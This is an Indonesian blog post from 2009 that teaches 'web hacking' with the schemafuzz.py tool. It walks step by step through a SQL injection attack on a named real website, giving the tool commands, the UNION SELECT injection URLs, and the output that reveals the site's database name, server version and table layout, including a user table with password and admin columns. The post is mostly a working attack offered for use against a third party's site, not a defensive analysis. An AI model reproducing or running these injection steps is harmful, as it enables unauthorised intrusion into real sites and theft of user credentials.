Sunday, November 8, 2009

Cara Hacking Web Menggunakan Schemafuzz.py

1.Python
2.Schemafuzz
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...


1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
[-] Done!



Berarti kita gunain
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
untuk inject

3.Cari database dg command --dbs
Misal : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--dbs
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


keliatan kan nama databasenya ??? t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D t15618_plb
Maka keluar:

[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done

0 komentar:

Visit the Site

Butuh template blog ini? monggo DOWNLOAD DISINI

Yahoo bot last visit powered by MyPagerank.Net Msn bot last visit powered by MyPagerank.Net Internet Blog Directory Computers Blogs

IBX582988F60A263

Matur suwun sanget wes neympet-nyempeti mampir dulur-dulur Blogger dan Netter sekalian